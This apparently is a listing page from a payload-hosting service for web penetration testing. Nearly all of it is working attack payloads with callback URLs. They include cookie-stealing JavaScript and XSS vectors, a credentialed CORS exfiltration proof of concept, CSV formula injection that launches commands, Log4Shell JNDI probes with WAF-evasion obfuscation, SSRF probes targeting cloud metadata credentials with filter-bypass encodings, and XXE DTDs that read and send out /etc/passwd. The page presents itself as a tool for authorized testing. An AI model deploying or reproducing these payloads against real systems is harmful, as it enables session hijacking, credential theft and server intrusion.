p.y7c.me // payload host_

[ canned test payloads · permissive CORS · authorized testing only ]

bin id — bakes <rand>.<id>.oob.y7c.me into the callback payloads below:

no bin set — payloads show a literal <ID>; create one at webhook.y7c.me or enter it above.

each fetch is freshly randomised (unique callback subdomain + mutated markers) to dodge signature/host WAF rules — all still correlate to your bin.

alert.js
JS-context canary — pops document.domain (randomised marker)

url: https://p.y7c.me/x/alert.js

/*vruwab*/AlERt(document.domain)
collect.js
JS-context exfil — beacons cookie + URL to your bin

url: https://p.y7c.me/x/collect.js

(function(){var _p9flv=document;new Image().src='//1imiaj.<ID>.oob.y7c.me/js?u='+encodeURIComponent(location.href)+'&c='+encodeURIComponent(_p9flv.cookie)})()
cors-poc.html
CORS exploit PoC — reads a credentialed cross-origin response (set TARGET) and exfils it

url: https://p.y7c.me/x/cors-poc.html

<!doctype html><html><body><script>
var TARGET='https://target.example/api/me';
var _p9flv=new XMLHttpRequest();_p9flv.withCredentials=true;_p9flv.open('GET',TARGET);_p9flv.onload=function(){new Image().src='//4p2j38.<ID>.oob.y7c.me/cors?d='+encodeURIComponent(_p9flv.responseText)};_p9flv.send()
</script></body></html>
inject.csv
CSV / formula injection — spreadsheet code-exec + OOB hyperlink variants

url: https://p.y7c.me/x/inject.csv

name,value
"=1+1","@SUM(1+9)*cmd|' /C calc'!A0"
"=HYPERLINK(""http://2xygbz.<ID>.oob.y7c.me/csv"",""click"")","=IMPORTXML(""http://n40qgp.<ID>.oob.y7c.me/csvx"",""//a"")"
log4shell.txt
Log4Shell JNDI probes incl. WAF-bypass obfuscations; the dns:// form hits your bin's DNS logger directly

url: https://p.y7c.me/x/log4shell.txt

${jndi:ldap://rzowop.<ID>.oob.y7c.me/a}
${jndi:dns://rzowop.<ID>.oob.y7c.me/a}
${jndi:rmi://rzowop.<ID>.oob.y7c.me/a}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://rzowop.<ID>.oob.y7c.me/a}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://rzowop.<ID>.oob.y7c.me/a}
${jndi:ldap://${hostName}.rzowop.<ID>.oob.y7c.me/a}
onerror.svg
standalone SVG that beacons to your bin when rendered inline

url: https://p.y7c.me/x/onerror.svg

<svg xmlns="http://www.w3.org/2000/svg" oNLoad="new Image().src='//rb3h0g.<ID>.oob.y7c.me/svg'"><sCRiPt>new Image().src='//z2ky5n.<ID>.oob.y7c.me/svg2'</scripT></svg>
poly.html
HTML page that reports back over DNS + HTTP to your bin

url: https://p.y7c.me/x/poly.html

<!doctype html><html><body><img src="//djj2va.<ID>.oob.y7c.me/img"><script>var _p9flv=document;new Image().src='//dhb1hc.<ID>.oob.y7c.me/js?c='+encodeURIComponent(_p9flv.cookie)</script></body></html>
redirect.html
meta-refresh open-redirect bait

url: https://p.y7c.me/x/redirect.html

<!doctype html><meta http-equiv="refresh" content="0;url=//sq5dnf.<ID>.oob.y7c.me/landed">
ssrf.txt
SSRF OOB probes (callback to your bin) + cloud metadata endpoints and encoding bypasses

url: https://p.y7c.me/x/ssrf.txt

# callbacks to your bin (confirm SSRF via DNS/HTTP):
http://qm17iy.<ID>.oob.y7c.me/ssrf
//qm17iy.<ID>.oob.y7c.me/ssrf
http://qm17iy.<ID>.oob.y7c.me@127.0.0.1/
http://127.0.0.1#qm17iy.<ID>.oob.y7c.me/
gopher://qm17iy.<ID>.oob.y7c.me:80/_GET%20/%20HTTP/1.0

# cloud metadata (try through the SSRF):
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://[::ffff:169.254.169.254]/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/   (header: Metadata-Flavor: Google)

# 169.254.169.254 encodings to dodge filters:
http://2852039166/latest/meta-data/
http://0xA9FEA9FE/latest/meta-data/
http://0251.0376.0251.0376/latest/meta-data/
xss.html
multi-vector XSS spray (img/svg/iframe/body) — each vector hits a distinct path so you see which fired

url: https://p.y7c.me/x/xss.html

<!doctype html><html><body>
<Img src=xonErROR="new Image().src='//u7y79m.<ID>.oob.y7c.me/img?c='+encodeURIComponent(document.cookie)">
<svg	ONLOAD="new Image().src='//9eu37y.<ID>.oob.y7c.me/svg'">
<IfRAmE srcdoc="<imG/SrC=x oneRror=&quot;new Image().src='//rrs1mf.<ID>.oob.y7c.me/iframe?c='+encodeURIComponent(document.cookie)&quot;>">
<BoDYonlOAD="new Image().src='//12rlhp.<ID>.oob.y7c.me/body'">
</body></html>
xxe-php.dtd
OOB XXE for PHP targets — base64-encodes the file via php://filter so multi-line files (e.g. /etc/passwd) survive the URL

url: https://p.y7c.me/x/xxe-php.dtd

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://55xe9k.<ID>.oob.y7c.me/xxe?d=%file;'>">
%eval;
%exfil;
xxe.dtd
external DTD for OOB XXE — exfils single-line/URL-safe files (e.g. /etc/hostname) in the query to your bin's HTTP timeline

url: https://p.y7c.me/x/xxe.dtd

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://1zeyqq.<ID>.oob.y7c.me/xxe?d=%file;'>">
%eval;
%exfil;

← tools.y7c.me · authorized security testing only · © 2026 Digital Gangster Enterprises, LLC